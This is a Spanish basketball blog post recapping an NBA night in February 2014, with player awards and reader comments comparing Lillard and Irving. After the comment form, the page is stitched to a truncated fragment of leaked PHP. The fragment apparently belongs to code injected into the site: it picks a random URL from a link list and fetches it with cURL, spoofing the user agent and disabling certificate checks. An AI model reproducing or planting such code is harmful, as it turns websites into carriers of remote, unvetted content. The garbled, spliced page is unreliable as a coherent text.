La Crónica: Los Clippers cortan el ascenso de los Rockets

27 de February de 2014 por Simon

Interesantísima jornada la que vivimos ayer en la NBA. Todos los capos del oeste entraron en acción y sólo Oklahoma y Houston perdieron por lo que la clasificación se apretó aún más. También hubo lesiones importantes: Goran Dragic se perdió el partido en Utah por un esguince y Anthony Davis se lesionó durante el encuentro de su equipo ante San Antonio Spurs.

El gran partido de la jornada se disputaba en el Staples. Los Angeles Clippers  recibían a unos enrachados Rockets que han ido ascendiendo en la clasificación en las últimas semanas. Los de Doc Rivers fueron capaces de frenar el empuje de Houston gracias a un invitado sorpresa. Darren Collison se vistió de Chris Paul y fue el gran protagonista de los minutos finales con varias canastas importantes que decidieron el partido (93-101). Ambos equipos sabían de la importancia del choque y el partido tuvo ese ambiente especial con aroma a “casi” play off pues ambos equipos llevan casi toda la temporada emparejados para una hipotética primera ronda. La derrota de los Rockets fue aprovechada por los Blazers que propinaron una paliza histórica a los Nets para recuperar la tercera plaza del Oeste. Hubiera sido mejor para los de Kidd no presentarse. Fu tan fácil el partido que los suplentes de Portland engordaran sus números hasta límites insospechados. Si  esto fuera boxeo los árbitros hubieran parado el partido mucho antes (80-124). 

La gran sorpresa de la jornada la dieron los Cleveland Cavaliers al vencer a domicilio a Oklahoma City que con esta suma su tercera derrota consecutiva. Los Cavs, con Irving como protagonista, tuvieron un último cuarto de ensueño que les dio la victoria (114-104) y les acerca más a plazas de Play Off después de una jornada propicia para  sus intereses pues tanto Atlanta como Detroit, sus máximos rivales perdieron. Los primeros ante Boston Celtics (104-115), con un gran último cuarto de Jerry Bayless  que marcó la diferencia en el duelo, y los segundos ante San Antonio Spurs (110-120), que no dieron espacio a la sorpresa en la vuelta de Leonard a la acción.

Los Bulls continúan con su gran momento de forma y ayer volvieron a demostrar su fortaleza en casa propinando un serio correctivo a los Golden State Warriors. Nningún titular de la bahía superó la decena de puntos en uno de los peores partidos de la temporada para los de Mark Jackson (83-103). Por su parte, Dallas Mavericks aprovechó la derrota de los Warriors para asaltar la sexta plaza del Oeste al conseguir una cómoda victoria ante unos Pelicans que perdieron a Anthony Davis por una lesión en el hombro (89-108).

La octava plaza del Este también está en el aire. Poco a poco la realidad va golpeando en la puerta de los Phoenix Suns y cuando han abierto la puerta se han encontrado cara a cara con los Grizzlies, que ya están encima y no tienen pinta de parar. Con la baja de Dragic, los Suns no fueran rivales siquiera de los Jazz (86-109). En cambio, los Grizzlies hicieron los deberes y en la primera parte ya dejaron la victoria sentenciada ante los Lakers (103-108).

Por último, en el único partido intrascendente de la jornada, los Magic rompieron su racha de 16 derrotas consecutivas fuera de casa en Philadelphia. En cambio, los Sixers siguen sumando decepciones y ya van 12 consecutivas (101-90). Víctor Oladipo dio anoche un nuevo bocado en su “remontada” por la disputa del ROY al cuajar un buen partido ante su máximo rival que además no tuvo una buena noche.

PREMIOS


MVP: 
Hacía tiempo que no veíamos un partido tan redondo de Kyrie Irving. 31 puntos con buenos porcentajes, 9 asistencias, 5 rebotes y 4 robos para ajusticiar a los Thunder.

Rookie: Victor Oladipo frente a frente con Michael Carter-Williams y el primero cuaja una gran actuación para ganar el partido. 17 puntos, 11 rebotes que empiezan a inclinar la balanza del RoY a su favor. Excelente actuación también de Archie Goodwin aunque en su caso no sirvió para lograr una urgentísima victoria para los Suns.

Sorpresa: Muy buenos minutos de Victor Claver ante New Jersey con 13 puntos, 5 rebotes y 1 asistencia, aunque el premio de hoy se lo birla su compañero Will Barton, con 20 puntos, 11 rebotes, 4 asistencias y 1 tapón saliendo desde muy al fondo del banquillo. Lo que les faltaría a los Blazers para empezar a dar miedo de verdad es que la segunda unidad empiece a funcionarles así.

Decepción: ¿Qué le pasa a Stephen Curry? ¿Está triste? La noche se le oscureció en Chicago con únicamente 5 puntos y porcentajes horrorosos. Además acumuló 5 pérdidas.

Esfuerzo en vano: Crisis existencial en Oklahoma coincidiendo con la vuelta de Westbrook y, ojo, con la ausencia de Kedrick Perkins. En medio del barro siempre destaca Kevin Durant, ayer rozó el triple doble con 28 puntos, 10 rebotes y 9 asistencias. Ni por esas.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. underlock dice:
    #1

    Es una delicia ver jugar a Lillard, va a marcar una época en la liga.

    Pregunta al aire: ¿Si tuviérais que reconstruir vuestro equipo que base elegiríais Lillard o Irving?

      Citar

  2. txusma dice:
    #2

    Hoy por hoy a Lillard, sin ninguna duda.

      Citar

  3. Sancho88 dice:
    #3

    Irving tiene más dominio de balón, es un jugador más de los 90, y un anotador incansable que es una gran amenaza en estático, muy versátil y polivalente, pero Lillard es más completo, menos preciosista, menos adonis de sí mismo, pero más efectivo y práctico. Difícil pregunta de todas formas…

      Citar

  4. Vader dice:
    #4

    Quizá con Llilard por su efectividad en los últimos segundos de los partidos…

      Citar

  5. Denise dice:
    #5

    underlock:

    Pregunta al aire: ¿Si tuviérais que reconstruir vuestro equipo que base elegiríais Lillard o Irving?

    A Lillard, incluso con una pierna y con gonorrea.

      Citar

  6. Esteban dice:
    #6

    que temporada extraña la de Irving, si bien es mala, se ha sacado 7 u 8 juegos de nivel MVP, el resto para olvidar, pero sin dudas el potencial esta alli

      Citar

  7. Lucho dice:
    #7

    Y Wall está ahi nomas también. Para mi a ese nivel. Gran jugador el de Washingyon

    Ahi nombraron a Lillard por el clutch. Ojo que Irving en eso es fantástico también, hasta mejor quizás

      Citar

  8. rumbero dice:
    #8

    Yo voy a romper una lanza a favor de Irving ya que creo que se está sobredimensionando bastante su mala temporada. Habiendo visto por desgracia unos cuantos partidos de los Cavs esta temporada, merece llevarse unos cuantos palos sí, pero no me cansaré de repetir que en ese sistema ofensivo es difícil brillar y más para un jugador como él. Ha perdido partidos como los ha ganado él sólo. El de esta madrugada contra Thunder es de talentazo puro, de verdad.

    Es que esa mala temporada a nivel individual se traduce en unos números bastante parecidos a los que tiene Lillard (y ya se que tiene trampa lo que digo porque no tengo en cuenta la posición de cada equipo…pero tampoco los rosters). Yo entiendo que no guste por sus filigranas e individualismo, pero ojo porque quitando las formas es un jugador bastante parecido a Lillard. No destacan por ser grandes defensores ni organizadores pero si unos anotadores brutales (cada uno a su manera como dice Sancho) buenos en el clutch y con necesidad de amasar mucho el balón. Cada uno escogerá al que más le guste, pero no me parece que Irving esté tan lejos de Lillard en esta comparativa.

      Citar

  9. Luis H. dice:
    #9

    A Irving le falta, básicamente, un entrenador que le enseñe a aglutinar egos sin herirse entre sí y que ponga al equipo a jugar en conjunto

      Citar

  10. Esteban dice:
    #10

    si, despues de dos termporadas en pleno progreso con Scott, llega Brown y de repente no sirve mas…

      Citar

  11. txusma dice:
    #11

    Es que hay q ser muy bueno (como Lebron) para poder sobrevivir a Mike Brown…

    Yo ya digo q ahora mismo me quedo con Lillard, aunq es cierto q Irving no está ni mucho menos acabado. Y John Wall tb se merece aparecer en este terceto, como Ricky Rubio… (es broma Esteban!!! 😀 )

      Citar

  12. Ruxixon dice:
    #12

    Lillard conjuga talento individual y sentido colectivo,por tanto me parece un jugador mucho más hecho para que una franquicia vaya creciendo.Irving probablemente tenga mayor talento bruto pero le falta demostrar que puede traducir su calidad en pos del beneficio del equipo.Sobre Irving,la temporada pasada no sé si estuvo la primera mitad de la misma pero recuerdo que tras el parón del All Star se empezaron a ver exhibiciones suyas frecuentemente.

    Vaya pu**da lo de Dragic,a ver si no es nada porque cualquier aspiración de PO pasa porque el jugador esloveno esté en cancha,aunque vuelva Bledsoe.

      Citar

  13. CAMPO2 dice:
    #13

    En tema de físico creo que Lillard a sufrido menos lesiones que Irving. Y Kemba?

      Citar

  14. Denise dice:
    #14

    Ahora mismo creo que nadie puede quejarse del nivel de los bases de la liga, hay un nivelazo de PG’s brutal. El SF y el PF creo que también está muy bien, en cambio en el SG y en el C creo que hay mucho menos nivel que en lustros anteriores. Hay buenos jugadores, pero salvo excepciones, no verdaderos cracks que marquen época.

      Citar

  15. Sancho88 dice:
    #15

    SF Denise? Top top sí que hay, pero la clase media de SF’s es una porquería. SG’s nada, PF muy buen nivel, igual que PG’s, y C’s… pues bueno, no abundan en cantidad, pero sí que hay calidad. Diría a ‘botepronto’ que hay mejor nivel de C’s que de SF’s. Claro, si vemos a LeBron, Durant, Carmelo y George, son la bomba, pero los otros 26 qué hacemos con ellos? Que hacemos con Deng e Iguodala, con Rudy Gay? Qué más mierda hay por ahí? Poca cosa más. Vienen Jabari y Wiggins para dar empaque, y yo confío mucho en Rodney Hood, pero nivel de titulares me cuesta verlo.

      Citar

  16. Denise dice:
    #16

    Sancho88:
    SF Denise? Top top sí que hay, pero la clase media de SF’s es una porquería. SG’s nada, PF muy buen nivel, igual que PG’s, y C’s… pues bueno, no abundan en cantidad, pero sí que hay calidad. Diría a ‘botepronto’ que hay mejor nivel de C’s que de SF’s. Claro, si vemos a LeBron, Durant, Carmelo y George, son la bomba, pero los otros 26 qué hacemos con ellos? Que hacemos con Deng e Iguodala, con Rudy Gay? Qué más mierda hay por ahí? Poca cosa más. Vienen Jabari y Wiggins para dar empaque, y yo confío mucho en Rodney Hood, pero nivel de titulares me cuesta verlo.

    Aparte de LeBron, Durant, Carmelo y George, que sólo con eso, ya es mucha tralla porque van a ser 4 jugadores míticos de la liga, a parte hay muy buenos jugadores, aparte de Deng, Iguodala y Gay, también están Batum, Parsons, Jeff Green, Hayward (que a mi no me gusta mucho, pero a la mayoria si), Josh Smith, Kawhi Leonard, Evan Turner, y como dices, llegan Jabari y Wiggins. A mi me parece que hay calidad y cantidad de sobra en este puesto.

      Citar

  17. Vader dice:
    #17

    Paul Pierce!!!

      Citar

  18. CAMPO2 dice:
    #18

    SG Harden, Kobe, Beal, Sir Lance-a-lot, Wade y Johnson,el resto prefiere jugar con dos bases

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>